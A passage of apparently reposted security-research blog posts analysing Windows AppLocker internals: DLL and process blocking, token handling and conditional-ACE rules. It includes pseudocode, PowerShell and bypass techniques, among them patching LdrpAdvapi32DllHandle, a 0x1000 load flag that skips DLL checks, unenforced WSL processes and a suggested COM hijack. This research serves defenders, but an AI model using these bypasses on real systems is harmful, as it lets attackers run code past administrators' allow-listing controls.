    You might wonder how is this COM class is registered? An implementor needs to register their COM object with a Category ID of "{56FFCC30-D398-11d0-B2AE-00A0C908FA49}". If you have OleViewDotNet setup (note there are other tools) you can dump all registered classes using the following PowerShell command:

    Get-ComCategory -CatId '56FFCC30-D398-11d0-B2AE-00A0C908FA49' | Select -ExpandProperty ClassEntries

    On a default installation of Windows 10 you should find a single class, "Windows Defender IOfficeAntiVirus implementation" registered which is implemented in the MPOAV DLL. We can try and create the class with DLL enforcement to convince ourselves that's the problem:

    PowerShell error when creating MSOAV COM object. Fails with AppLocker policy block error.

    No doubt this has been documented before (and I've not looked [update:20191206] of course Hexacorn blogged about it) but you could probably COM hijack this class (or register your own) and get notified of every executable downloaded by the user's web browser. Perhaps even backdoor everything. I've not tested that however ;-)

    This issue does demonstrate a common weakness with any application allow-listing solution. You've got to add a rule to allow this (probably undocumented) folder in your DLL rules. Or you could allow-list all Microsoft Defender certificates I suppose. Potentially both of these criteria could change and you end up having to fix random breakage which wouldn't be fun across a large fleet of machines. It also demonstrates a weird issue with attachment scanning, if your AV is somehow misconfigured things will break and there's no obvious reason why. Perhaps we need to move on from using outdated APIs to do this process or at least handle failure better.

    The Internals of AppLocker - Part 4 - Blocking DLL Loading

    By: tiraniddo
    21 November 2019 at 06:42
    This is part 4 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 3 here. As I've mentioned before this is how AL works on Windows 10 1909, it might differ on other versions of Windows.

    In the first three parts of this series I covered the basics of how AL blocked process creation. We can now tackle another, optional component, blocking DLL loading. If you dig into the Group Policy Editor for Windows you will find a fairly strong warning about enabling DLL rules for AL:

    Warning text on DLL rules staying that enabling them could affect system performance.

    It seems MS doesn't necessarily recommend enabling DLL blocking rules, but we'll dig in anyway as I can't find any official documentation on how it works and it's always interesting to better understand how something works before relying on it.

    We know from the part 1 that there's a policy for DLLs in the DLL.Applocker file. We might as well start with dumping the Security Descriptor from the file using the Format-AppLockerSecurityDescriptor function from part 3, to check it matches our expectations. The DACL is as follows:

     - Type  : AllowedCallback
     - Name  : Everyone
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: APPID://PATH Contains "%WINDIR%\*"

     - Type  : AllowedCallback
     - Name  : Everyone
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

     - Type  : AllowedCallback
     - Name  : BUILTIN\Administrators
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: APPID://PATH Contains "*"

     - Type  : Allowed
     - Name  : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
     - Access: Execute|ReadAttributes|ReadControl|Synchronize

     - Type  : Allowed
     - Name  : APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES
     - Access: Execute|ReadAttributes|ReadControl|Synchronize

    Nothing shocking here, just our rules written out in a security descriptor. However it gives us a hint that perhaps some of the enforcement is being done inside the kernel driver. Unsurprisingly if you look at the names in APPID you'll find a function called SrpVerifyDll. There's a good chance that's our target to investigate.

    By chasing references you'll find the SrpVerifyDll function being called via a Device IO control code to an device object exposed by the APPID driver (\Device\SrpDevice). I'll save you the effort of reverse engineering, as it's pretty routine. The control code and input/output structures are as follows:

    // 0x225804
    #define IOCTL_SRP_VERIFY_DLL CTL_CODE(FILE_DEVICE_UNKNOWN, 1537, \
                METHOD_BUFFERED, FILE_READ_DATA)

    struct SRP_VERIFY_DLL_INPUT {
        ULONGLONG FileHandle;
        USHORT FileNameLength;
        WCHAR FileName[ANYSIZE_ARRAY];
    };

    struct SRP_VERIFY_DLL_OUTPUT {
        NTSTATUS VerifyStatus;
    };

    Looking at SrpVerifyDll itself there's not much to really note. It's basically very similar to the verification done for process creation I described in detail in part 2 and 3:
    1. An access check token is captured and duplicated. If the token is restricted query for the logon session token instead.
    2. The token is checked whether it can bypass policy by being SANDBOX_INERT or a service.
    3. Security attributes are gathered using AiGetFileAttributes on the passed in file handle.
    4. Security attributes set on token using AiSetTokenAttributes.
    5. Access check performed using policy security descriptor and status result written back to the Device IO Control output.
    It makes sense the the security attributes have to be recreated as the access check needs to know the information about the DLL being loaded not the original executable. Even though a file name is passed in the input structure as far as I can tell it's only used for logging purposes.

    There is one big difference in step 1 where the token is captured over the one I documented in part 3. In process blocking if the current token was a non-elevated UAC token then the code would query for the full elevated token and use that to do the access check. This means that even if you were creating a process as the non-elevated user the access check was still performed as if you were an administrator. In DLL blocking this step does not take place, which can lead to a weird case of being able to create a process in any location, but not being able to load any DLLs in the same directory with the default policy. I don't know if this is intentional or Microsoft just don't care?

    Who calls the Device IO Control to verify the DLL? To save me some effort I just set a breakpoint on SrpVerifyDll in the kernel debugger and then dumped the stack to find out the caller:

    Breakpoint 1 hit
    appid!SrpVerifyDll:
    fffff803`38cff100 48895c2410      mov qword ptr [rsp+10h],rbx
    0: kd> kc
     # Call Site
    00 appid!SrpVerifyDll
    01 appid!AipDeviceIoControlDispatch
    02 nt!IofCallDriver
    03 nt!IopSynchronousServiceTail
    04 nt!IopXxxControlFile
    05 nt!NtDeviceIoControlFile
    06 nt!KiSystemServiceCopyEnd
    07 ntdll!NtDeviceIoControlFile
    08 ADVAPI32!SaferpIsDllAllowed
    09 ADVAPI32!SaferiIsDllAllowed
    0a ntdll!LdrpMapDllNtFileName
    0b ntdll!LdrpMapDllFullPath
    0c ntdll!LdrpProcessWork
    0d ntdll!LdrpLoadDllInternal
    0e ntdll!LdrpLoadDll

    Easy, it's being called from the function SaferiIsDllAllowed which is being invoked from LdrLoadDll. This of course makes perfect sense, however it's interesting that NTDLL is calling a function in ADVAPI32, has MS never heard of layering violations? Let's look into LdrpMapDllNtFileName which is the last function in NTLL before the transition to ADVAPI32. The code which calls SaferiIsDllAllowed looks like the following:

    NTSTATUS status;

    if ((LoadInfo->LoadFlags & 0x100) == 0 
            && LdrpAdvapi32DllHandle) {
      status = LdrpSaferIsDllAllowedRoutine(
            LoadInfo->FileHandle, LoadInfo->FileName);
    }

    The call to SaferiIsDllAllowed  is actually made from a global function pointer. This makes sense as NTDLL can't realistically link directly to ADVAPI32. Something must be initializing these values, and that something is LdrpCodeAuthzInitialize. This initialization function is called during the loader initialization process before any non-system code runs in the new process. It first checks some registry keys, mostly importantly whether "\Registry\Machine\System\CurrentControlSet\Control\Srp\GP\DLL" has any sub-keys, and if so it proceeds to load the ADVAPI32 library using LdrLoadDll and query for the exported SaferiIsDllAllowed function. It stores the DLL handle in LdrpAdvapi32DllHandle and the function pointer 'XOR' encrypted in LdrpSaferIsDllAllowedRoutine.

    Once SaferiIsDllAllowed is called the status is checked. If it's not STATUS_SUCCESS then the loader backs out and refuses to continue loading the DLL. It's worth reiterating how different this is from WDAC, where the security checks are done inside the kernel image mapping process. You shouldn't be able to even create a mapped image section which isn't allowed by policy when WDAC is enforced. However with AL loading a DLL is just a case of bypassing the check inside a user mode component.

    If we look back at the calling code in LdrpMapDllNtFileName we notice there are two conditions which must be met before the check is made, the LoadFlags must not have the flag 0x100 set and LdrpAdvapi32DllHandle must be non-zero.

    The most obvious condition to modify is LdrpAdvapi32DllHandle. If you already have code running (say VBA) you could use WriteProcessMemory to modify the memory location of LdrpAdvapi32DllHandle to be 0. Now any calls to LoadLibrary will not get verified and you can load any DLL you like outside of policy. In theory you might also be able to get the load of ADVAPI32 to fail. However unless LdrLoadDll returns STATUS_NOT_FOUND for the DLL load then the error causes the process to fail during initialization. As ADVAPI32 is in the known DLLs I can't see an easy way around this (I tried by renaming the main executable trick from the AMSI bypass).

    The other condition, the LoadFlags is more interesting. There still exists a documented LOAD_IGNORE_CODE_AUTHZ_LEVEL flag you can pass to LoadLibraryEx which used to be able to bypass AppLocker DLL verification. However, as with SANDBOX_INERT this in theory was limited to only System and TrustedInstaller with KB2532445, although according to Stefan Kanthak it might not be blocked. That said I can't get this flag to do anything on Windows 10 1909 and tracing through LdrLoadDll it doesn't look like it's ever used. Where does this 0x100 flag come from then? Seems it's set by the LDrpDllCharacteristicsToLoadFlags function at the start of LdrLoadDll. Which looks like the following:

    int LdrpDllCharacteristicsToLoadFlags(int DllCharacteristics) {
      int load_flags = 0;
      // ...
      if (DllCharacteristics & 0x1000)
        load_flags |= 0x100;
       
      return load_flags;
    }

    If we pass in 0x1000 as a DllCharacteristics flag (this doesn't seem to work by putting it in the DLL PE headers as far as I can tell) which is the second parameter to LdrLoadDll then the DLL will not be verified against the DLL policy. The DLL Characteristic flag 0x1000 is documented as IMAGE_DLLCHARACTERISTICS_APPCONTAINER but I don't know what API sets this flag in the call to LdrLoadDll. My original guess was LoadPackagedLibrary but that doesn't seem to be the case.

    A simple PowerShell script to test this flag is below:
    If you run Start-Dll "Path\To\Any.DLL" where the DLL is not in an allowed location you should find it fails. However if you run Start-Dll "Path\To\Any.DLL" 0x1000 you'll find the DLL now loads.

    Of course realistically the DLL blocking is really more about bypassing the process blocking by using the DLL loader instead. Without being able to call LdrLoadDll or writing to process memory it won't be easy to bypass the DLL verification (but of course it will not impossible).

    This is the last part on AL for a while, I've got to do other things. I might revisit this topic later to discuss AppX support, SmartLocker and some other fun tricks.

    The Internals of AppLocker - Part 3 - Access Tokens and Access Checking

    By: tiraniddo
    20 November 2019 at 06:30
    This is part 3 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 4 here.

    In the last part I outlined how process creation is blocked with AL. I crucially left out exactly how the rules are processed to determine if a particular user was allowed to create a process. As it makes more sense to do so, we're going to go in reverse order from how the process was described in the last post. Let's start with talking about the access check implemented by SrppAccessCheck.

    Access Checking and Security Descriptors

    For all intents the SrppAccessCheck function is just a wrapper around a specially exported kernel API SeSrpAccessCheck. While the API has a few unusual features for this discussion might as well assume it to be the normal SeAccessCheck API. 

    A Windows access check takes 4 main parameters:
    • SECURITY_SUBJECT_CONTEXT which identifies the caller's access tokens.
    • A desired access mask.
    • A GENERIC_MAPPING structure which allows the access check to convert generic access to object specific access rights.
    • And most importantly, the Security Descriptor which describes the security of the resource being checked.
    Let's look at some code.

    NTSTATUS SrpAccessCheckCommon(HANDLE TokenHandle, BYTE* Policy) {
        
        SECURITY_SUBJECT_CONTEXT Subject = {};
        ObReferenceObjectByHandle(TokenHandle, &Subject.PrimaryToken);
        
        DWORD SecurityOffset = *((DWORD*)Policy+4)
        PSECURITY_DESCRIPTOR SD = Policy + SecurityOffset;
        
        NTSTATUS AccessStatus;
        if (!SeSrpAccessCheck(&Subject, FILE_EXECUTE
                              &FileGenericMapping, 
                              SD, &AccessStatus) &&
            AccessStatus == STATUS_ACCESS_DENIED) {
            return STATUS_ACCESS_DISABLED_BY_POLICY_OTHER;
        }
        
        return AccessStatus;
    }

    The code isn't very complex, first it builds a SECURITY_SUBJECT_CONTEXT structure manually from the access token passed in as a handle. It uses a policy pointer passed in to find the security descriptor it wants to use for the check. Finally a call is made to SeSrpAccessCheck requesting file execute access. If the check fails with an access denied error it gets converted to the AL specific policy error, otherwise any other success or failure is returned.

    The only thing we don't really know in this process is what the Policy value is and therefore what the security descriptor is. We could trace through the code to find how the Policy value is set , but sometimes it's just easier to breakpoint on the function of interest in a kernel debugger and dump the pointed at memory. Taking the debugging approach shows the following:

    WinDBG window showing the hex output of the policy pointer which shows the on-disk policy.

    Well, what do we have here? We've seen those first 4 characters before, it's the magic signature of the on-disk policy files from part 1. SeSrpAccessCheck is extracting a value from offset 16, which is used as an offset into the same buffer to get the security descriptor. Maybe the policy files already contain the security descriptor we seek? Writing some quick PowerShell I ran it on the Exe.AppLocker policy file to see the result:

    PowerShell console showing the security output by the script from Exe.Applocker policy file.

    Success, the security descriptor is already compiled into the policy file! The following script defines two functions, Get-AppLockerSecurityDescriptor and Format-AppLockerSecurityDescriptor. Both take a policy file as input and returns either a security descriptor object or formatted representation:

    If we run Format-AppLockerSecurityDescriptor on the Exe.Applocker file we get the following output for the DACL (trimmed for brevity):

     - Type  : AllowedCallback
     - Name  : Everyone
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: APPID://PATH Contains "%WINDIR%\*"

     - Type  : AllowedCallback
     - Name  : BUILTIN\Administrators
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: APPID://PATH Contains "*"

     - Type  : AllowedCallback
     - Name  : Everyone
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

     - Type  : Allowed
     - Name  : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
     - Access: Execute|ReadAttributes|ReadControl|Synchronize

     - Type  : Allowed
     - Name  : APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES
     - Access: Execute|ReadAttributes|ReadControl|Synchronize

    We can see we have two ACEs which are for the Everyone group and one for the Administrators group. This matches up with the default configuration we setup in part 1. The last two entries are just there to ensure this access check works correctly when run from an App Container.

    The most interesting part is the Condition field. This is a rarely used (at least for consumer version of the OS) feature of the security access checking in the kernel which allows a conditional expression evaluated to determine if an ACE is enabled or not. In this case we're seeing the SDDL format (documentation) but under the hood it's actually a binary structure. If we assume that the '*' acts as a globbing character then again this matches our rules, which let's remember:
    • Allow Everyone group access to run any executable under %WINDIR% and %PROGRAMFILES%.
    • Allow Administrators group to run any executable from anywhere.
    This is how AL's rules are enforced. When you configure a rule you specify a group, which is added as the SID in an ACE in the policy file's Security Descriptor. The ACE type is set to either Allow or Deny and then a condition is constructed which enforces the rule, whether it be a path, a file hash or a publisher.

    In fact let's add policy entries for a hash and publisher and see what condition is set for them. Download a new policy file from this link and run the Set-AppLockerPolicy command in an admin PowerShell console. Then re-run Format-ApplockerSecurityDescriptor:

     - Type  : AllowedCallback
     - Name  : Everyone
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Condition: (Exists APPID://SHA256HASH) && (APPID://SHA256HASH Any_of {#5bf6ccc91dd715e18d6769af97dd3ad6a15d2b70326e834474d952753
    118c670})

     - Type  : AllowedCallback
     - Name  : Everyone
     - Access: Execute|ReadAttributes|ReadControl|Synchronize
     - Flags : None
     - Condition: (Exists APPID://FQBN) && (APPID://FQBN >= {"O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS
    ® OPERATING SYSTEM\*", 0})

    We can now see the two new conditional ACEs, for a SHA256 hash and the publisher subject name. Basically rinse and repeat as more rules and conditions are added to the policy they'll be added to the security descriptor with the appropriate ACEs. Note that the ordering of the rules are very important, for example Deny ACEs will always go first. I assume the policy file generation code correctly handles the security descriptor generation, but you can now audit it to make sure.

    While we now understand how the rules are enforced, where does the values for the condition, such as APPID://PATH come from? If you read the (poor) documentation about conditional ACEs you'll find these values are Security Attributes. The attributes can be either globally defined or assigned to an access token. Each attribute has a name, then a list of one or more values which can be strings, integers, binary blobs etc. This is what AL is using to store the data in the access check token.

    Let's go back a step and see what's going on with AiSetAttributesExe to see how these security attributes are generated.

    Setting Token Attributes

    The AiSetAttributesExe function takes 4 parameters:
    • A handle to the executable file.
    • Pointer to the current policy.
    • Handle to the primary token of the new process.
    • Handle to the token used for the access check.
    The code isn't doesn't look very complex, initially:

    NTSTATUS AiSetAttributesExe(
                PVOID Policy, 
                HANDLE FileHandle, 
                HANDLE ProcessToken, 
                HANDLE AccessCheckToken) {
      
        PSECURITY_ATTRIBUTES SecAttr;
        AiGetFileAttributes(Policy, FileHandle, &SecAttr);
        NTSTATUS status = AiSetTokenAttributes(ProcessToken, SecAttr);
        if (NT_SUCCESS(status) && ProcessToken != AccessCheckToken)
            status = AiSetTokenAttributes(AccessCheckToken, SecAttr);
        return status;
    }

    All the code does it call AiGetFileAttributes, which fills in a SECURITY_ATTRIBUTES structure, and then calls AiSetTokenAttributes to set them on the ProcessToken and the AccessCheckToken (if different). AiSetTokenAttributes is pretty much a simple wrapper around the exported (and undocumented) kernel API SeSetSecurityAttributesToken which takes the generated list of security attributes and adds them to the access token for later use in the access check.

    The first thing AiGetFileAttributes does is query the file handle for it's full path, however this is the native path and takes the form \Device\Volume\Path\To\File. A path of this form is pretty much useless if you wanted to generate a single policy to deploy across an enterprise, such as through Group Policy. Therefore the code converts it back to a Win32 style path such as c:\Path\To\File. Even then there's no guarantee that the OS drive is C:, and what about wanting to have executables on USB keys or other removable drives where the letter could change?

    To give the widest coverage the driver also maintains a fixed list of "Macros" which look like Environment variable expansions. These are used to replace the OS drive components as well as define placeholders for removable media. We already saw them in use in the dump of the security descriptor with string components like "%WINDIR%". You can find a list of the macros here, but I'll reproduce them here:
    • %WINDIR% - Windows Folder.
    • %SYSTEM32% - Both System32 and SysWOW64 (on x64).
    • %PROGRAMFILES% - Both Program Files and Program Files (x86).
    • %OSDRIVE% - The OS install drive.
    • %REMOVABLE% - Removable drive, such a CD or DVD.
    • %HOT% - Hot-pluggable devices such as USB keys.
    Note that SYSTEM32 and PROGRAMFILES will map to either 32 or 64 bit directories when running on a 64 bit system (and presumably also ARM directories on ARM builds of Windows?). If you want to pick a specific directory you'll have to configure the rules to not use the macros.

    To hedge its bets AL puts every possible path configuration, native path, Win32 path and all possible macroed paths as string values in the APPID://PATH security attribute.

    AiGetFileAttributes continues, gathering the publisher information for the file. On Windows 10 the signature and certificate checking is done in multiple ways, first checking the kernel Code Integrity module (CI), then doing some internal work and finally falling back to calling over RPC to the running APPIDSVC. The information, along with the version number of the binary is put into the APPID://FQBN attribute, which stands for Fully Qualified Binary Name.

    The final step is generating the file hash, which is stored in a binary blob attribute. AL supports three hash algorithms with the following attribute names:
    • APPID://SHA256HASH - Authenticode SHA256.
    • APPID://SHA1HASH - Authenticode SHA1
    • APPID://SHA256FLATHASH - SHA256 over entire file.
    As the attributes are applied to both tokens we should be able to see them on the primary token of a normal user process. By running the following PowerShell command we can see the added security attributes on the current process token.

    PS> $(Get-NtToken).SecurityAttributes | ? Name -Match APPID

    Name       : APPID://PATH
    ValueType  : String
    Flags      : NonInheritable, CaseSensitive
    Values     : {
       %SYSTEM32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE,
       %WINDIR%\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE,  
        ...}

    Name       : APPID://SHA256HASH
    ValueType  : OctetString
    Flags      : NonInheritable
    Values     : {133 66 87 106 ... 85 24 67}

    Name       : APPID://FQBN
    ValueType  : Fqbn
    Flags      : NonInheritable, CaseSensitive
    Values     : {Version 10.0.18362.1 - O=MICROSOFT CORPORATION, ... }


    Note that the APPID://PATH attribute is always added, however APPID://FQBN and APPID://*HASH are only generated and added if there are rules which rely on them.

    The Mystery of the Twin Tokens

    We've come to the final stage, we now know how the security attributes are generated and applied to the two access tokens. The question now is why is there two tokens, the process token and one just for access checking?

    Everything happens inside AiGetTokens, which is shown in a simplified form below:


    NTSTATUS AiGetTokens(HANDLE ProcessId,

    PHANDLE ProcessToken,

    PHANDLE AccessCheckToken)

    {

      AiOpenTokenByProcessId(ProcessId, &TokenHandle);

      NTSTATUS status = STATUS_SUCCESS;
      *Token = TokenHandle;
      if (!AccessCheckToken)
        return STATUS_SUCCESS;

      BOOL IsRestricted;
      status = ZwQueryInformationToken(TokenHandle, TokenIsRestricted, &IsRestricted);
      DWORD ElevationType;
      status = ZwQueryInformationToken(TokenHandle, TokenElevationType,
    &ElevationType);

      HANDLE NewToken = NULL;
      if (ElevationType != TokenElevationTypeFull)
          status = ZwQueryInformationToken(TokenHandle, TokenLinkedToken,
    &NewToken);

      if (!IsRestricted
        || NT_SUCCESS(status)
        || (status = SeGetLogonSessionToken(TokenHandle, 0,
    &NewToken), NT_SUCCESS(status))
        || status == STATUS_NO_TOKEN) {
        if (NewToken)
          *AccessCheckToken = NewToken;
        else
          *AccessCheckToken = TokenHandle;
      }

      return status;
    }

    Let's summarize what's going on. First, the easy one, the ProcessToken handle is just the process token opened from the process, based on its PID. If the AccessCheckToken is not specified then the function ends here. Otherwise the AccessCheckToken is set to one of three values
    1. If the token is a non-elevated (UAC) token then use the full elevated token.
    2. If the token is 'restricted' and not a UAC token then use the logon session token.
    3. Otherwise use the primary token of the new process.
    We can now understand why a non-elevated UAC admin has Administrator rules applied to them. If you're running as the non-elevated user token then case 1 kicks in and sets the AccessCheckToken to the full administrator token. Now any rule checks which specify the Administrators group will pass.

    Case 2 is also interesting, a "restricted" token in this case is one which has been passed through the CreateRestrictedToken API and has restricted SIDs attached. This is used by various sandboxes especially Chromium's (and by extension anyone who uses it such as Firefox). Case 2 ensures that if the process token is restricted and therefore might not pass the access check, say the Everyone group is disabled, then the access check is done instead against the logon session's token, which is the master token from which all others are derived in a logon session.

    If nothing else matches then case 3 kicks in and just assigns the primary token to the AccessCheckToken. There are edges cases in these rules. For example you can use CreateRestrictedToken to create a new access token with disabled groups, but which doesn't have restricted SIDs. This results in case 2 not being applied and so the access check is done against the limited token which could very easily fail to validate causing the process to be terminated.

    There's also a more subtle edge case here if you look back at the code. If you create a restricted token of a UAC admin token then process creation typically fails during the policy check. When the UAC token is a full admin token the second call to ZwQueryInformationToken will not be made which results in NewToken being NULL. However in the final check, IsRestricted is TRUE so the second condition is checked, as status is STATUS_SUCCESS (from the first call to ZwQueryInformationToken) this passes and we enter the if block without ever calling SeGetLogonSessionToken. As NewToken is still NULL AccessCheckToken is set to the primary process token which is the restricted token which will cause the subsequent access check to fail. This is actually a long standing bug in Chromium, it can't be run as UAC admin if AppLocker is enforced.

    That's the end of how AL does process enforcement. Hopefully it's been helpful. Next time I'll dig into how DLL enforcement works.

    Locking Resources to Specific Processes

    Before we go, here's a silly trick which might now be obvious. Ever wanted to restrict access to resources, such as files, to specific processes? With the AL applied security attributes now you can. All you need to do is apply the same conditional ACE syntax to your file and the kernel will do the enforcement for you. For example create the text file C:\TEMP\ABC.TXT, now to only allow notepad to open it do the following in PowerShell:

    Set-NtSecurityDescriptor \??\C:\TEMP\ABC.TXT `
         -SecurityDescriptor 'D:(XA;;GA;;;WD;(APPID://PATH Contains "%SYSTEM32%\NOTEPAD.EXE"))' `
         -SecurityInformation Dacl

    Make sure that the path is in all upper case. You should now find that while PowerShell (or any other application) can't open the text file you can open and modify it just fine in notepad. Of course this won't work across network boundaries and is pretty easy to get around, but that's not my problem ;-)



    The Internals of AppLocker - Part 2 - Blocking Process Creation

    By: tiraniddo
    18 November 2019 at 06:06
    This is part 2 in a short series on the internals of AppLocker (AL). Part 1 is here, part 3 here and part 4 here.

    In the previous blog post I briefly discussed the architecture of AppLocker (AL) and how to setup a really basic test system based on Windows 10 1909 Enterprise. This time I'm going to start going into more depth about how AL blocks the creation of processes which are not permitted by policy. I'll reiterate in case you've forgotten that what I'm describing is the internals on Windows 10 1909, the details can and also certainly are different on other operating systems.

    How Can You Block Process Creation?

    When the APPID driver starts it registers a process notification callback with the PsSetCreateProcessNotifyRoutineEx API. A process notification callback can return an error code by assigning to the CreationStatus field of the PS_CREATE_NOTIFY_INFO structure to block process creation. If the kernel detects a callback setting an error code then the process is immediately terminated by calling PsTerminateProcess.

    An interesting observation is that the process notification callback is NOT called when the process object is created. It's actually called when the first thread is inserted into the process. The callback is made in the context of the thread creating the new thread, which is usually the thread creating the process, but it doesn't have to be. If you look in the PspInsertThread function in the kernel you'll find code which looks like the following:

    if (++Process->ActiveThreads == 1)
      CurrentFlags |= FLAG_FIRST_THREAD;
    // ...
    if (CurrentFlags & FLAG_FIRST_THREAD) {
      if (!Process->Flags3.Minimal || Process->PicoContext)
        PspCallProcessNotifyRoutines(Process);
    }

    This code first increments the active thread count for the process. If the current count is 1 then a flag is set for use later in the function. Further on the call is made to PspCallProcessNotifyRoutines to invoke the registered callbacks, which is where the APPID callback will be invoked.

    The fact the callback seems to be called at process creation time is due to most processes being created using NtCreateUserProcess which does both the process and the initial thread creation as one operation. However you could call NtCreateProcessEx to create a new process and that will be successful, just, in theory, you could never insert a thread into it without triggering the notification. Whether there's a race condition here, where you could get ActiveThreadCount to never be 1 I wouldn't like to say, almost certainly there's a process lock which would prevent it.

    The behavior of blocking process creation after the process has been created is the key difference between WDAC and AL. WDAC prevents the creation of any executable code which doesn't meet the defined policy, therefore if you try and create a process with an executable file which doesn't match the policy it'll fail very early in process creation. However AL will allow you to create a process, doing many of the initialization tasks, and only once a thread is inserted into the process will the rug be pulled away.

    The use of the process notification callback does have one current weakness, it doesn't work on Windows Subsystem for Linux processes. And when I say it doesn't work the APPID callback never gets invoked, and as process creation is blocked by invoking the callback this means any WSL process will run unmolested.

    It isn't anything to do with the the checks for Minimal/PicoContext in the code above (or seemingly due to image formats as Alex Ionescu mentioned in his talk on WSL although that might be why AL doesn;t even try), but it's due to the way the APPID driver has enabled its notification callback. Specifically APPID calls the PsSetCreateProcessNotifyRoutineEx method, however this will not generate callbacks for WSL processes. Instead APPID needs to use PsSetCreateProcessNotifyRoutineEx2 to get callbacks for WSL processes. While it's probably not worth MS implementing actual AL support for WSL processes I'm surprised they don't give an option to block outright rather than just allowing anything to run.

    Why Does AppLocker Decide to Block a Process?

    We now know how process creation is blocked, but we don't know why AL decides a process should be blocked. Of course we have our configured rules which much be enforced somehow. Each rule consists of three parts:
    1. Whether the rule allows the process to be created or whether it denies creation.
    2. The User or Group the rule applies to.
    3. The property that the rule checks for, this could be an executable path, the hash of the executable file or publisher certificate and version information. A simple path example is "%WINDIR%\*" which allows any executable to run as long as it's located under the Windows Directory.
    Let's dig into the APPID process notification callback, AiProcessNotifyRoutine, to find out what is actually happening, the simplified code is below:

    void AiProcessNotifyRoutine(PEPROCESS Process, 
                    HANDLE ProcessId, 
    PPS_CREATE_NOTIFY_INFO CreateInfo) {
      PUNICODE_STRING ImageFileName;
      if (CreateInfo->FileOpenNameAvailable)
        ImageFileName = CreateInfo->ImageFileName;
      else
        SeLocateProcessImageName(Process, 
                                 &ImageFileName);

      CreateInfo->CreationStatus = AipCreateProcessNotifyRoutine(
                 ProcessId, ImageFileName, 
                 CreateInfo->FileObject, 
                 Process, CreateInfo);
    }

    The first thing the callback does is extract the path to the executable image for the process being checked. The PS_CREATE_NOTIFY_INFO structure passed to the callback can contain the image file path if the FileOpenNameAvailable flag is set. However there are situations where this flag is not set (such as in WSL) in which case the code gets the path using SeLocateProcessImageName. We know that having the full image path is important as that's one of the main selection criteria in the AL rule sets.

    The next call is to the inner function, AipCreateProcessNotifyRoutine. The returned status code from this function is assigned to CreationStatus so if this function fails then the process will be terminatedThere's a lot going on in this function, I'm going to simplify it as much as I can to get the basic gist of what's going on while glossing over some features such as AppX support and Smart Locker (though they might come back in a later blog post). For now it looks like the following:

    NTSTATUS AipCreateProcessNotifyRoutine(
            HANDLE ProcessId, 
            PUNICODE_STRING ImageFileName, 
            PFILE_OBJECT ImageFileObject, 
            PVOID Process, 
            PPS_CREATE_NOTIFY_INFO CreateInfo) {

        POLICY* policy = SrpGetPolicy();
        if (!policy)
            return STATUS_ACCESS_DISABLED_BY_POLICY_OTHER;
        
        HANDLE ProcessToken;
        HANDLE AccessCheckToken;
        
        AiGetTokens(ProcessId, &ProcessToken, &AccessCheckToken);

        if (AiIsTokenSandBoxed(ProcessToken))
            return STATUS_SUCCESS;

        BOOLEAN ServiceToken = SrpIsTokenService(ProcessToken);
        if (SrpServiceBypass(Policy, ServiceToken, 0, TRUE))
            return STATUS_SUCCESS;
        
        HANDLE FileHandle;
        AiOpenImageFile(ImageFileName,
                        ImageFileObject, 
                        &FileHandle);
        AiSetAttributesExe(Policy, FileHandle, 
                           ProcessToken, AccessCheckToken);
        
        NTSTATUS result = SrppAccessCheck(
                          AccessCheckToken,
                          Policy);
        
        if (!NT_SUCCESS(result)) {
            AiLogFileAndStatusEvent(...);
            if (Policy->AuditOnly)
                result = STATUS_SUCCESS;
        }
        
        return result;
    }

    A lot to unpack here, be we can start at the beginning. The first thing the code does is request the current global policy object. If there doesn't exist a configured policy then the status code STATUS_ACCESS_DISABLED_BY_POLICY_OTHER is returned. You'll see this status code come up a lot when the process is blocked. Normally even if AL isn't enabled there's still a policy object, it'll just be configured to not block anything. I could imagine if somehow there was no global policy then every process creation would fail, which would not be good.

    Next we get into the core of the check, first with a call to the function AiGetTokens. This functions opens a handle to the target process' access token based on its PID (why it doesn't just use the Process object from the PS_CREATE_NOTIFY_INFO structure escapes me, but this is probably just legacy code). It also returns a second token handle, the access check token, we'll see how this is important later.

    The code then checks two things based on the process token. First it checks if the token is AiIsTokenSandBoxed. Unfortunately this is badly named, at least in a modern context as it doesn't refer to whether the token is a restricted token such as used in web browser sandboxes. What this is actually checking is whether the token has the Sandbox Inert flag set. One way of setting this flag is by calling CreateRestrictedToken passing the SANDBOX_INERT flag. Since Windows 8, or Windows with KB2532445 installed the "caller must be running as LocalSystem or TrustedInstaller or the system ignores this flag" according to the documentation. The documentation isn't entirely correct on this point, if you go and look at the implementation in NtFilterToken you'll find you can also set the flag if you're have the SERVICE SID, which is basically all services regardless of type. The result of this check is if the process token has the Sandbox Inert flag set then a success code is returned and AL is bypassed for this new process.

    The second check determines if the token is a service token, first calling SrpIsTokenService to get a true or false value, then calls SrpServiceBypass to determine if the current policy allows service tokens to bypass the policy as well. If SrpServiceBypass returns true then the callback also returns a success code bypassing AL. However it seems it is possible to configure AL to enforce process checks on service processes, however I can't for the life of me find the documentation for this setting. It's probably far too dangerous a setting to allow the average sysadmin to use.

    What's considered a service context is very similar to setting the Sandbox Inert flag with CreateRestrictedToken. If you have one of the following groups in the process token it's considered a service:

    NT AUTHORITY\SYSTEM
    NT AUTHORITY\SERVICE
    NT AUTHORITY\RESTRICTED
    NT AUTHORITY\WRITE RESTRICTED

    The last two groups are only used to allow for services running as restricted or write restricted. Without them access would not be granted in the service check and AL might end being enforced when it shouldn't.

